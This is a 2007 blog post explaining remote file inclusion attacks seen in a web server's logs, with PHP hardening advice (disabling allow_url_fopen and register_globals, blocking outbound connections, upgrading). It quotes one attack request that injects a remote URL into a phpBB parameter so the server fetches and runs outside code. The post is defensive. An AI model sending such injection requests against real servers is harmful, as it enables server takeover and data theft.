Running a web server is dangerous · 2007-01-17 15:57 by Wladimir Palant
I guess some of you run a web server. Maybe you have noticed entries like this one in your logs:
"GET /forum/admin/admin_styles.php?phpbb_root_path=http://some.server.name/0wn/mail.txt?%5d\r HTTP/1.1" 302 5 "-" "-"
What is this about? In this particular case somebody tried to use a security hole in an older phpBB version to execute PHP code loaded from another server. I had several hundreds of entries like this one in the last month, targeting vulnerabilities in all kinds of PHP scripts (most of which are not even installed here). The attackers tried to install backdoors, defacement tools or in one case a simple script to send all e-mail addresses from the local phpBB installation to its owner. The requests are usually done by other web servers, I guess those have the backdoor already installed (a botnet).
What can you do to protect yourself? Make sure to configure your PHP installation properly. First off all, disallow functions like fopen() or include() to load files from remote servers — set the option allow_url_fopen=0. Some of the attacks also depend on URL parameters being taken over as global variables, you should make sure that this security hole is closed as well: register_globals=off. Both settings can be set in php.ini as well as .htaccess files.
My hosting provider went one step further and reconfigured the firewall so that the server can no longer initiate connections into the internet. It was a little inconvenient when I had to ask for a configuration change so I could have a script connect to mozdev.org but the security gain is certainly worth it. And of course, you should not forget to upgrade the software you are running. Most developers offer you a mailing list you can subscribe to to get notified when a new version of a web script comes out.
Commenting is closed for this article.